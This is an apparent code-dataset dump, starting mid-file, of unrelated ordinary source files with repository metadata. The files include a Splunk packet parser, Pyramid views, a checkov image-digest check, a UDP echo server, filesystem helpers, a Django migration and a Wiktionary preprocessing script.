            pieces.append("block_len=%u block=%s" % (
                len(self.block),
                json.dumps(str(self.block))))
        return " ".join(pieces)

    def read(self, handle):
        """
        Read a length-prefixed protocol data from a file handle, filling this object

        @param handle: File handle to read from
        @rtype: bool
        @return: False if we're at EOF
        """
        # Skip any stray newlines that precede the opcode byte.
        while True:
            first_byte = handle.read(1)
            if first_byte == b"":
                return False
            if first_byte != b"\n":
                break
        self.opcode = ord(first_byte)
        if self.is_first():
            piece_count = self._read_number(handle)
            components = []
            for _ in range(piece_count):
                piece = self._read_string(handle)
                if sys.version_info >= (3, 0):
                    piece = piece.decode()
                components.append(piece)
            self.command = components
            arg = self._read_string(handle)
            if arg == b"":
                self.command_arg = None
            else:
                if sys.version_info >= (3, 0):
                    arg = arg.decode()
                self.command_arg = arg
        if self.has_block():
            self.block = self._read_string(handle)
        return True

    @staticmethod
    def _read_to_eol(handle):
        # Collect bytes up to (but excluding) the next b"\n"; EOFError only
        # when EOF is hit before any byte was read.
        buf = b""
        while True:
            ch = handle.read(1)
            if not ch:
                if buf == b"":
                    raise EOFError
                break
            if ch == b'\n':
                break
            buf += ch
        return buf

    @staticmethod
    def _read_number(handle):
        # Blank lines before the count are tolerated and skipped.
        line = PersistentServerConnectionRequestPacket._read_to_eol(handle)
        while line == b"":
            line = PersistentServerConnectionRequestPacket._read_to_eol(handle)
        try:
            value = int(line)
        except ValueError:
            raise PersistentServerConnectionProtocolException("expected non-negative integer, got \"%s\"" % line)
        if value < 0:
            raise PersistentServerConnectionProtocolException("expected non-negative integer, got \"%d\"" % value)
        return value

    @staticmethod
    def _read_string(handle):
        # A string is its byte length on one line, then exactly that many bytes.
        length = PersistentServerConnectionRequestPacket._read_number(handle)
        return handle.read(length)
class PersistentServerConnectionPacketParser(object):
    """
    Virtual class which handles packet-level I/O with stdin/stdout. The
    handle_packet method must be overridden.
    """
    def __init__(self):
        # Set by write(); tells run() that stdout needs a flush after the packet.
        self._owed_flush = False
    def write(self, data):
        """
        Write out a string, preceded by its length. If a dict is passed
        in, it is automatically JSON encoded

        @param data: String or dictionary to send.
        """
        if sys.version_info >= (3, 0):
            # Python 3: write the length header and payload as bytes on the
            # underlying binary buffer.
            if isinstance(data, bytes):
                sys.stdout.buffer.write(("%u\n" % len(data)).encode("ascii"))
                sys.stdout.buffer.write(data)
            elif isinstance(data, str):
                edata = data.encode("utf-8")
                sys.stdout.buffer.write(("%u\n" % len(edata)).encode("ascii"))
                sys.stdout.buffer.write(edata)
            elif isinstance(data, dict):
                # Compact separators keep the JSON payload (and its length) minimal.
                edata = json.dumps(data, separators=(',', ':')).encode("utf-8")
                sys.stdout.buffer.write(("%u\n" % len(edata)).encode("ascii"))
                sys.stdout.buffer.write(edata)
            else:
                raise TypeError("Don't know how to serialize %s" % type(data).__name__)
        else:
            # Python 2: str/unicode are both covered by splunk.util.string_type.
            if isinstance(data, splunk.util.string_type):
                sys.stdout.write("%u\n%s" % (len(data), data))
            elif isinstance(data, dict):
                s = json.dumps(data, separators=(',', ':'))
                sys.stdout.write("%u\n%s" % (len(s), s))
            else:
                raise TypeError("Don't know how to serialize %s" % type(data).__name__)
        self._owed_flush = True
    def run(self):
        """
        Continuously read packets from stdin, passing each one to handle_packet()
        """
        if os.name.startswith("nt"):
            # Windows defaults stdin/stdout to text mode, which would mangle
            # the binary protocol; switch both to binary mode.
            import msvcrt
            msvcrt.setmode(sys.stdin.fileno(), os.O_BINARY)
            msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
        while True:
            in_packet = PersistentServerConnectionRequestPacket()
            handle = sys.stdin
            if sys.version_info >= (3, 0):
                handle = sys.stdin.buffer
            if not in_packet.read(handle):
                break  # EOF: the peer closed the stream
            self.handle_packet(in_packet)
            # Flush once per packet rather than after every write() call.
            if self._owed_flush:
                sys.stdout.flush()
                self._owed_flush = False
    def handle_packet(self, in_packet):
        """
        Virtual method called for each received packet

        @param in_packet: PersistentServerConnectionRequestPacket object received
        """
        raise NotImplementedError("PersistentServerConnectionPacketParser.handle_packet")
| [
"[email protected]"
] | |
828624b6a0bd565af050bba8f33e9056adbcecb7 | 7ac271f357f4c8f0c23c697b11966259f836880f | /app/web/api/dvdrental/actors/views.py | c01616606759e970c7df14c53e3b08550a941cdf | [] | no_license | cheng93/PythonWeb | 74a58eadee4ee7d2872a582a907bbf47630df371 | d5ced8dee1d5ba31778125c5e67169c92acf26a0 | refs/heads/develop | 2021-01-19T23:59:11.315871 | 2018-03-04T19:26:18 | 2018-03-04T19:26:18 | 89,063,916 | 0 | 0 | null | 2018-03-04T19:26:19 | 2017-04-22T11:09:14 | Python | UTF-8 | Python | false | false | 865 | py | from pyramid.view import view_defaults, view_config
@view_defaults(renderer='json', request_method='GET')
class ActorsView:
    """Read-only JSON endpoints for actors, backed by request.actor_command."""

    def __init__(self, request):
        # Pyramid hands each view instance the active request.
        self.request = request

    @view_config(route_name='get_actors')
    def get_actors(self):
        """Return every actor as a list of plain dicts."""
        return [vars(actor) for actor in self.request.actor_command.get_actors()]

    @view_config(route_name='get_actor')
    def get_actor(self):
        """Return a single actor, looked up by the actor_id route segment."""
        actor = self.request.actor_command.get_actor(self.request.matchdict['actor_id'])
        return vars(actor)

    @view_config(route_name='get_actor_films')
    def get_actor_films(self):
        """Return the films of one actor as a list of plain dicts."""
        actor_id = self.request.matchdict['actor_id']
        return [vars(film) for film in self.request.actor_command.get_actor_films(actor_id)]
| [
"[email protected]"
] | |
dc07e10ef638298141ad655475063b1d466b7bd6 | adbf09a31415e6cf692ff349bd908ea25ded42a8 | /challenges/custm_error.py | 6588a2c0db988b4e09b75f6b79a1402a21026bb8 | [] | no_license | cmulliss/gui_python | 53a569f301cc82b58880c3c0b2b415fad1ecc3f8 | 6c83d8c2e834464b99024ffd8cf46ac4e734e7a4 | refs/heads/main | 2023-08-12T22:33:01.596005 | 2021-10-11T12:35:41 | 2021-10-11T12:35:41 | 408,176,101 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 945 | py | class TooManyPagesReadError(ValueError):
pass
class Book:
    """A book that tracks reading progress and refuses to read past the end."""

    def __init__(self, name: str, page_count: int):
        self.name = name
        self.page_count = page_count
        self.pages_read = 0

    def __repr__(self):
        return f"<Book {self.name}, read {self.pages_read} pages out of {self.page_count}>"

    def read(self, pages: int):
        """Advance the bookmark by *pages*; raise TooManyPagesReadError on overflow."""
        total = self.pages_read + pages
        if total > self.page_count:
            raise TooManyPagesReadError(
                f"You tried to read {self.pages_read + pages} pages, but this book only has {self.page_count} pages."
            )
        self.pages_read = total
        print(f"You have now read {self.pages_read} pages out of {self.page_count}")
# Demo: the first read (35 pages) succeeds; the second would total 85 pages
# in a 50-page book, so the custom exception is raised and printed.
python101 = Book("Python 101", 50)
try:
    python101.read(35)
    python101.read(50)
except TooManyPagesReadError as e:
    print(e)
# This now raises an error, which has a helpful name and a helpful error message.
| [
"[email protected]"
] | |
0231d5a6b9754525fcc80fa184b2442b8c4d82d2 | b449980703b2234e5610d20d22d54cb811722b68 | /netdisco/discoverables/nanoleaf_aurora.py | 135d785a425446491b59ae18c63cdcf06bf42dd8 | [
"Apache-2.0"
] | permissive | bdraco/netdisco | 81209c0ad21b2ca124b91fa67799034c337d62a8 | cf547a8bac673f5aa92cde98824929fc9a31f05b | refs/heads/master | 2023-06-17T09:40:18.001345 | 2020-06-17T21:23:05 | 2020-06-17T21:23:05 | 275,917,535 | 0 | 0 | NOASSERTION | 2020-06-29T20:20:12 | 2020-06-29T20:20:12 | null | UTF-8 | Python | false | false | 278 | py | """Discover Nanoleaf Aurora devices."""
from . import MDNSDiscoverable
class Discoverable(MDNSDiscoverable):
    """Add support for discovering Nanoleaf Aurora devices."""
    def __init__(self, nd):
        # Aurora panels advertise themselves under the mDNS service type
        # "_nanoleafapi._tcp.local.".
        super(Discoverable, self).__init__(nd, '_nanoleafapi._tcp.local.')
| [
"[email protected]"
] | |
25164cbffde1974a5c531b3dfc519310cb45c313 | 334d0a4652c44d0c313e11b6dcf8fb89829c6dbe | /checkov/terraform/checks/resource/kubernetes/ImageDigest.py | 92de4c65bc61d761b0e9ee2ee9f999bd465db7c8 | [
"Apache-2.0"
] | permissive | schosterbarak/checkov | 4131e03b88ae91d82b2fa211f17e370a6f881157 | ea6d697de4de2083c8f6a7aa9ceceffd6b621b58 | refs/heads/master | 2022-05-22T18:12:40.994315 | 2022-04-28T07:44:05 | 2022-04-28T07:59:17 | 233,451,426 | 0 | 0 | Apache-2.0 | 2020-03-23T12:12:23 | 2020-01-12T20:07:15 | Python | UTF-8 | Python | false | false | 1,563 | py |
from checkov.common.models.enums import CheckCategories, CheckResult
from checkov.terraform.checks.resource.base_resource_check import BaseResourceCheck
class ImageDigest(BaseResourceCheck):
    def __init__(self):
        """
        The image specification should use a digest instead of a tag to make sure the container always uses the same
        version of the image.
        https://kubernetes.io/docs/concepts/configuration/overview/#container-images
        An admission controller could be used to enforce the use of image digest
        """
        name = "Image should use digest"
        id = "CKV_K8S_43"
        supported_resources = ["kubernetes_pod"]
        categories = [CheckCategories.GENERAL_SECURITY]
        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)

    def scan_resource_conf(self, conf) -> CheckResult:
        """Fail when any container image reference is not pinned by an '@' digest.

        conf is the parsed kubernetes_pod resource; values are wrapped in lists.
        """
        # BUGFIX: conf.get('spec') may be absent -> old code raised TypeError
        # on the [0] subscript.
        spec_list = conf.get('spec')
        if not spec_list:
            return CheckResult.FAILED
        spec = spec_list[0]
        if not spec:
            return CheckResult.FAILED
        # BUGFIX: a spec without a "container" key used to crash on
        # enumerate(None); treat it as "no unpinned images".
        for idx, container in enumerate(spec.get("container") or []):
            if not isinstance(container, dict):
                return CheckResult.UNKNOWN
            image = container.get("image")
            if image and isinstance(image, list):
                # The '@' separator marks a digest reference (name@sha256:...).
                if "@" not in image[0]:
                    self.evaluated_keys = [f'spec/[0]/container/[{idx}]/image']
                    return CheckResult.FAILED
        return CheckResult.PASSED
# Module-level singleton; instantiating presumably registers the check with
# checkov's runner (registration happens in the base class — confirm).
check = ImageDigest()
| [
"[email protected]"
] | |
4485c5cf11f59565b40a8d538af812f0554de596 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03089/s906755257.py | 498b64bddcd6ad6dac9dc95de7a88f6376c3de4f | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 293 | py | N = int(input())
B = list(map(int, input().split()))
# Reconstruct the insertion order by undoing operations: at each step remove
# the rightmost element whose value equals its 1-based position. If no such
# element exists, the sequence B cannot be produced.
ans = []
for i in range(N):
    last = 0
    for j, b in enumerate(B, 1):
        if b == j:
            last = b  # keep the rightmost removable position
    if last == 0:
        print(-1)
        exit()
    ans.append(B.pop(last - 1))
# Removals were recorded backwards; print them in insertion order.
# (Was a list comprehension used purely for its print side effects.)
for a in ans[::-1]:
    print(a)
"[email protected]"
] | |
df774daf61ba15eb90766bfcf097cd921934fd35 | bdcf56bc8fdf4255b34038bf0280f21917f185a7 | /005_landmarks_retrieval/test_data_generator.py | e8957bda42baa14c938c1e8339c6d7db082c7560 | [] | no_license | Apollo1840/United_Kagglers | 8dc05287f893a33f774efeaf0cd2ad436122dc69 | 80147867a6011da5a36e78473781481c805619ea | refs/heads/master | 2020-04-10T18:51:29.223449 | 2019-04-13T08:32:25 | 2019-04-13T08:32:25 | 161,214,800 | 1 | 0 | null | 2019-04-06T09:16:40 | 2018-12-10T17:53:31 | Python | UTF-8 | Python | false | false | 474 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Apr 6 08:30:38 2019
@author: zouco
"""
from data_generator import triplet_generation
from data_generator import DataGenerator
# Smoke test for triplet_generation: build the triplet input for one image ID
# and report its structure.
tg = triplet_generation()
ID = "00cfd9bbf55a241e"
img3 = tg.get_one_input_tensor(ID)
print(len(img3))
print(img3[0].shape)
from tools.plot_image import plot_imgs
plot_imgs(img3)
# Smoke test for DataGenerator: fetch batch #1 and report the batch shapes.
# NOTE(review): the arguments ("test", None) look like a split name and an
# unused/optional config — confirm against data_generator.DataGenerator.
dg = DataGenerator("test", None)
X, y = dg.__getitem__(1)
# print(X)
print(len(X))
print(X[0].shape)
print(y.shape)
| [
"[email protected]"
] | |
0b8635d05f232b3683ce31ae12276f9c46ef05a3 | 35b58dedc97622b1973456d907ede6ab86c0d966 | /day022/day22.py | 8f8b5cb73e108c01ced7d4dee535666b5e32f737 | [] | no_license | GithubLucasSong/PythonProject | 7bb2bcc8af2de725b2ed9cc5bfedfd64a9a56635 | e3602b4cb8af9391c6dbeaebb845829ffb7ab15f | refs/heads/master | 2022-11-23T05:32:44.622532 | 2020-07-24T08:27:12 | 2020-07-24T08:27:12 | 282,165,132 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,186 | py | # from socket import *
# s = socket(AF_INET,SOCK_DGRAM) #创建套接字
# addr = ('192.168.14.25',8080) #准备接收方地址
# data = input('请输入:')
# s.sendto(data.encode(),addr)
# #发送数据时,python3需要将字符串装换成byte
# #encode('utf-8') 用utf-8对数据进行编码,获得bytes类型对象
# #decode()反过来
# s.close()
# from socket import *
# import time
#
# s = socket(AF_INET,SOCK_DGRAM) #创建套接字
# s.bind(('', 8788))
# addr = ('192.168.14.25',8788) #准备接收方地址
# data = input('亲输入:')
# s.sendto(data.encode(),addr)
# time.sleep(1)
# #等待接收数据
# data = s.recvfrom(1024)
# # 1024表示本次接收的最大的字节数
# print(data)
from socket import *
# Create the UDP datagram socket.
udpSocket = socket(AF_INET,SOCK_DGRAM)
# Bind local address info so the OS does not assign a random port.
binAddr = ('',7088)
udpSocket.bind(binAddr)
num = 0
while True:
    # Receive a datagram from the peer (data, address) tuple.
    recvData = udpSocket.recvfrom(1024)
    print(recvData)
    # Echo the received payload back to the sender's address.
    udpSocket.sendto(recvData[0],recvData[1])
    num += 1
    print('已将接收到的第%d个数据返回给对方,'%num)
udpSocket.close()  # NOTE: unreachable — the loop above never exits
"[email protected]"
] | |
1eb767cf72d777c0f346fc7cee95917651a364a3 | b736c527824198e1b07c821b685ca679cede79dd | /classes/FileSystemTools.py | 6485992423ec7a372ece0d2d6edc96202280c550 | [] | no_license | LaoKpa/neat-3 | c276b58ce2dd77ea32b701820adc29b99f508ec7 | b2b89023db5822d498b3edc84f8b84880dc6e6b6 | refs/heads/master | 2022-03-19T08:57:40.857925 | 2019-11-16T05:29:17 | 2019-11-16T05:29:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,461 | py | from datetime import datetime
from os import mkdir
import os
from copy import copy,deepcopy
import time
import glob
import subprocess
def getDateString():
    """Current local time as 'DD-MM-YYYY_HH-MM-SS', suitable for filenames."""
    now = datetime.now()
    return now.strftime('%d-%m-%Y_%H-%M-%S')
def makeDir(dir_name):
    """Create dir_name and return it.

    Relative paths resolve against the caller's working directory, even when
    this helper lives in a library directory.
    """
    os.mkdir(dir_name)
    return dir_name
def makeDateDir(base_dir='.'):
    """Create a directory under base_dir named after the current datestamp."""
    stamp = getDateString()
    target = combineDirAndFile(base_dir, stamp)
    makeDir(target)
    return target
def makeLabelDateDir(label, base_dir='.'):
    """Create base_dir/<label>_<datestamp> and return the created path."""
    target = combineDirAndFile(base_dir, label + '_' + getDateString())
    makeDir(target)
    return target
def combineDirAndFile(dir, file):
    """Join dir and file, inserting a '/' between them when dir lacks one."""
    prefix = addTrailingSlashIfNeeded(dir)
    return prefix + file
def dictPrettyPrint(in_dict):
    """Print in_dict with one tab-indented 'key : value' entry per line."""
    lines = ['{']
    for key, val in in_dict.items():
        lines.append('\t{} : {}'.format(key, val))
    body = '\n'.join(lines) + '\n\n}\n'
    print(body)
def dictToStringList(dict):
    """Render a dict as ['k=v', ...], formatting floats and dropping None values."""
    formatted = copy(dict)
    for key, val in formatted.items():
        # Floats get fixed-point for normal magnitudes, scientific for tiny ones.
        if type(val) is float:
            if abs(val) > 10**-4:
                formatted[key] = '{:.5f}'.format(val)
            else:
                formatted[key] = '{:.2E}'.format(val)
    return [str(key) + '=' + str(val) for key, val in formatted.items() if val is not None]
def paramDictToFnameStr(param_dict):
    """Underscore-joined 'k=v' string usable as a filename; None values dropped."""
    return '_'.join(dictToStringList(param_dict))
def paramDictToLabelStr(param_dict):
    """Comma-separated 'k=v' string usable as a plot label; None values dropped."""
    return ', '.join(dictToStringList(param_dict))
def listToFname(list):
    """Join the given strings with underscores to form a filename."""
    return '_'.join(list)
def parseSingleAndListParams(param_dict, exclude_list):
    """Split a parameter dict into varied (list-valued) and fixed entries.

    Pass an arg normally (my_arg=5) to keep it fixed, or as a list
    (my_arg=[1, 5, 8]) to vary it; all varied lists are matched up
    element-wise, so they must be the same length. Names in exclude_list are
    left out of the fixed set.

    Returns a tuple of:
      * the names of the varied parameters,
      * a list of full kwargs dicts (fixed + one combination of varied values),
      * a list of dicts holding only the varied values for each combination.
    """
    varied_names = []
    varied_values = []
    fixed = {}
    for name, value in param_dict.items():
        if type(value).__name__ == 'list':
            varied_names.append(name)
            varied_values.append(value)
        elif name not in exclude_list:
            fixed[name] = value
    vary_param_dicts = []
    vary_param_tups = []
    # zip matches the i-th element of every varied list into one combination.
    for combo in zip(*varied_values):
        varied_only = dict(zip(varied_names, combo))
        vary_param_tups.append(varied_only)
        vary_param_dicts.append({**fixed, **varied_only})
    return (varied_names, vary_param_dicts, vary_param_tups)
def strfdelta(tdelta, fmt):
    """Format a timedelta via fmt, which may use {days} {hours} {minutes} {seconds}."""
    fields = {"days": tdelta.days}
    fields["hours"], remainder = divmod(tdelta.seconds, 3600)
    fields["minutes"], fields["seconds"] = divmod(remainder, 60)
    return fmt.format(**fields)
def getCurTimeObj():
    """Return the current local time as a datetime object."""
    return datetime.now()
def getTimeDiffNum(start_time_obj):
    """Return the seconds elapsed since start_time_obj as a float."""
    now_ts = datetime.timestamp(datetime.now())
    return now_ts - datetime.timestamp(start_time_obj)
def getTimeDiffObj(start_time_obj):
    """Return the time elapsed since start_time_obj as a timedelta."""
    return datetime.now() - start_time_obj
def getTimeDiffStr(start_time_obj):
    """Return the elapsed time since start_time_obj as 'H hrs, M mins, S s'."""
    elapsed = getTimeDiffObj(start_time_obj)
    return strfdelta(elapsed, '{hours} hrs, {minutes} mins, {seconds} s')
def writeDictToFile(dict, fname):
    """Write dict to fname as one 'key = value' line per entry.

    Float values are formatted (fixed-point for normal magnitudes, scientific
    for tiny ones). The dict is shallow-copied first so the caller's values
    are not replaced by their formatted strings.
    """
    my_dict = copy(dict)
    # 'with' guarantees the handle is closed even if formatting or writing
    # raises (the original leaked the handle on error).
    with open(fname, 'w+') as f:
        for k, v in my_dict.items():
            if type(v).__name__ == 'float':
                if abs(v) > 10**-4:
                    my_dict[k] = '{:.5f}'.format(v)
                else:
                    my_dict[k] = '{:.2E}'.format(v)
            f.write('{} = {}\n'.format(k, my_dict[k]))
def readFileToDict(fname):
    """Read 'key = value' lines (as written by writeDictToFile) into a dict.

    Values that parse as floats are returned as floats; everything else stays
    a string.
    """
    d = {}
    with open(fname) as f:
        for line in f:
            # maxsplit=1 keeps values that themselves contain ' = ' intact
            # (the bare 2-way unpack used to raise ValueError on them).
            key, val = line.split(' = ', 1)
            val = val.strip('\n')
            # Everything is read in as a string; promote numeric values.
            try:
                val = float(val)
            except ValueError:  # was a bare except; only conversion errors expected
                pass
            d[key] = val
    return d
def dirFromFullPath(fname):
    """Return the directory part of a path (with trailing slash), './' if none.

    BUGFIX: the original used str.replace(last_part, ''), which also removed
    any earlier occurrence of the filename text inside the path (e.g.
    'ab/b' became 'a/' instead of 'ab/'). Slice off the suffix instead.
    """
    last_part = fname.split('/')[-1]
    path = fname[:len(fname) - len(last_part)]
    if path == '':
        return './'
    return path
def fnameFromFullPath(fname):
    """Return just the final path component of fname."""
    return fname.rsplit('/', 1)[-1]
def stripAnyTrailingSlash(path):
    """Return path without a single trailing '/', if one is present.

    Also tolerates the empty string (the original raised IndexError on
    path[-1] for '').
    """
    if path.endswith('/'):
        return path[:-1]
    return path
def addTrailingSlashIfNeeded(path):
    """Return path ending with '/', appending one only when missing.

    The empty string is returned unchanged (the original raised IndexError
    on path[-1] for '').
    """
    if path == '' or path.endswith('/'):
        return path
    return path + '/'
def gifFromImages(imgs_path, gif_name, ext = '.png', delay=50):
    """Assemble numbered frames from imgs_path into imgs_path/<gif_name>.gif.

    Frames must be named <number><ext> so they can be sorted numerically.
    Requires ImageMagick's `convert` binary on PATH; `delay` is passed to
    `convert -delay` (presumably ImageMagick ticks, 1/100 s — confirm).
    Returns the path of the generated gif.
    """
    imgs_path = stripAnyTrailingSlash(imgs_path)
    file_list = glob.glob(imgs_path + '/' + '*' + ext) # Get all the pngs in the current directory
    #print(file_list)
    #print([fnameFromFullPath(x).split('.png')[0] for x in file_list])
    #list.sort(file_list, key=lambda x: int(x.split('_')[1].split('.png')[0]))
    # Sort numerically on the bare filename (e.g. "12.png" -> 12).
    list.sort(file_list, key=lambda x: int(fnameFromFullPath(x).split(ext)[0]))
    #list.sort(file_list) # Sort the images by #, this may need to be tweaked for your use case
    #print(file_list)
    assert len(file_list) < 300, 'Too many files ({}), will probably crash convert command.'.format(len(file_list))
    output_fname = '{}/{}.gif'.format(imgs_path, gif_name)
    check_call_arglist = ['convert'] + ['-delay', str(delay)] + file_list + [output_fname]
    #print(check_call_arglist)
    print('Calling convert command to create gif...')
    subprocess.check_call(check_call_arglist)
    print('done.')
    return(output_fname)
    # older method:
    '''with open('image_list.txt', 'w') as file:
        for item in file_list:
            file.write("%s\n" % item)
    os.system('convert @image_list.txt {}/{}.gif'.format(imgs_path,gif_name)) # On windows convert is 'magick'
    '''
| [
"[email protected]"
] | |
375a018c63de5a9df57f07c26829657f66bcfbeb | c369443df5ff98eccc0eee7f63bb8947f2943605 | /shop/migrations/0002_product_photo.py | 6f674858a235d0794a6b5cc89516d04cb88266a3 | [] | no_license | erllan/shop-test | d2934f484b25d141a60caa5aca31a61eec48f055 | 1f77de177192ce6a1f8c5ccf1d7ca93ec026acf5 | refs/heads/master | 2023-03-06T01:04:38.785383 | 2021-02-27T18:02:07 | 2021-02-27T18:02:07 | 341,929,117 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 408 | py | # Generated by Django 3.1.7 on 2021-02-26 11:11
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: add an image field 'photo' to shop.Product."""

    # Must be applied after the initial shop schema migration.
    dependencies = [
        ('shop', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='product',
            name='photo',
            field=models.ImageField(default='static/image', upload_to='product/photo/'),
        ),
    ]
| [
"[email protected]"
] | |
22a186c790c53f60967d236882877184068afc26 | e199c0648ee56c84d421bb47b2b5c163a1bd4cf1 | /prep/prep_wiktionary.py | 70fb588952e6e9f0cbea315305346013b12561da | [
"MIT"
] | permissive | inoue0406/VocabularyPF | 72a3abea4b920c7959997198ef02374e5d16782a | 077300f82ef358ceb77e80f79ecb66f8124efbf6 | refs/heads/main | 2023-06-23T00:56:46.477992 | 2021-07-23T15:38:05 | 2021-07-23T15:38:05 | 365,765,325 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,143 | py | # prep for wiktionary data
import json
import pandas as pd
#import wiktextract
def extract_pronunciation(sounds):
    """Concatenate every IPA pronunciation found in a Wiktionary ``sounds`` list.

    Entries without an "ipa" key are skipped; the remaining IPA strings are
    joined in order. Returns "" when none are present.
    (Replaces an index-based loop with string += concatenation.)
    """
    return "".join(entry["ipa"] for entry in sounds if "ipa" in entry)
if __name__ == '__main__':
    # Inputs
    # 1: Wiktionary dump file (one JSON object per line, from kaikki.org)
    fjson = "../data/Wiktionary/kaikki.org-dictionary-English.json"
    # 2: word list (NGSL)
    df_words = pd.read_csv('../data/NGSL_Word_Freq_list.csv')
    # Outputs
    fcsv = open('../data/out_wordlist_NGSL_Wiktionary.csv', 'w', encoding='utf-8')
    print("word,sound,sense",file=fcsv)
    with open(fjson, "r") as f:
        count = 0
        for line in f:
            data = json.loads(line)
            # extract data
            if "word" in data.keys():
                word = data['word']
                # Debug hook left in place for a specific word.
                if word == "pyre":
                    #import pdb;pdb.set_trace()
                    pass
                # if contained in NGSL list
                # (counts how many "Lemma" rows equal this word; 0 => absent)
                if sum(df_words["Lemma"] == word)==0:
                    print(word,"not contained in NGSL. Skip.")
                    continue
                print("processing word:",word)
                if "sounds" in data.keys():
                    sound =extract_pronunciation(data["sounds"])
                else:
                    sound = ""
                # Take only the first gloss of the first sense, if any.
                if "senses" in data.keys():
                    if "glosses" in data['senses'][0]:
                        sense = data['senses'][0]['glosses'][0]
                    else:
                        sense = "NA"
                else:
                    sense = "NA"
                #import pdb;pdb.set_trace()
                print("%s,%s,'%s'" % (word,sound,sense),file=fcsv)
                #lst.append(data)
                count = count + 1
                #if count > 100:
| [
"[email protected]"
] | |
de8792347405aadd837977316f12004147297193 | 8ed1430279ae52fd950dd0afe88549a100001e26 | /share/qt/extract_strings_qt.py | fefe2a907b40cfcfc4faa38e5f166048293fadca | [
"MIT"
] | permissive | mirzaei-ce/core-najafbit | 9fb70dbd4e17ec1635d7b886db17f8aab3f592bb | 6de34210a9ba9cc3f21fee631bc1a1f4d12d445d | refs/heads/master | 2021-08-11T08:53:58.165742 | 2017-11-13T13:00:14 | 2017-11-13T13:00:14 | 110,548,740 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,876 | py | #!/usr/bin/python
'''
Extract _("...") strings for translation and convert to Qt4 stringdefs so that
they can be picked up by Qt linguist.
'''
from subprocess import Popen, PIPE
import glob
import operator
import os
import sys
OUT_CPP="qt/najafbitstrings.cpp"  # generated C++ file picked up by Qt linguist
EMPTY=['""']  # msgid of the PO header entry; such entries are skipped below
def parse_po(text):
    """
    Parse 'po' format produced by xgettext.
    Return a list of (msgid,msgstr) tuples.
    """
    messages = []
    cur_id = []
    cur_str = []
    in_msgid = False
    in_msgstr = False
    for raw in text.split('\n'):
        raw = raw.rstrip('\r')
        if raw.startswith('msgid '):
            # A new entry begins; flush the previous one if it was complete.
            if in_msgstr:
                messages.append((cur_id, cur_str))
                in_msgstr = False
            in_msgid = True
            cur_id = [raw[6:]]
        elif raw.startswith('msgstr '):
            in_msgid = False
            in_msgstr = True
            cur_str = [raw[7:]]
        elif raw.startswith('"'):
            # Quoted continuation line: belongs to whichever section is open.
            if in_msgid:
                cur_id.append(raw)
            if in_msgstr:
                cur_str.append(raw)
    # Flush the final entry if the text ended inside a msgstr.
    if in_msgstr:
        messages.append((cur_id, cur_str))
    return messages
# Source files to scan are passed on the command line.
files = sys.argv[1:]
# xgettext -n --keyword=_ $FILES
# The xgettext binary can be overridden through the XGETTEXT env var.
XGETTEXT=os.getenv('XGETTEXT', 'xgettext')
child = Popen([XGETTEXT,'--output=-','-n','--keyword=_'] + files, stdout=PIPE)
(out, err) = child.communicate()
# NOTE(review): under Python 3 `out` is bytes and parse_po's str handling
# would fail — this script targets the Python 2 shebang above; confirm.
messages = parse_po(out)
f = open(OUT_CPP, 'w')
f.write("""
#include <QtGlobal>
// Automatically generated by extract_strings.py
#ifdef __GNUC__
#define UNUSED __attribute__((unused))
#else
#define UNUSED
#endif
""")
f.write('static const char UNUSED *najafbit_strings[] = {\n')
# Deterministic output: sort entries by msgid before emitting.
messages.sort(key=operator.itemgetter(0))
for (msgid, msgstr) in messages:
    # Skip the PO header entry (empty msgid).
    if msgid != EMPTY:
        f.write('QT_TRANSLATE_NOOP("najafbit-core", %s),\n' % ('\n'.join(msgid)))
f.write('};\n')
f.close()
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.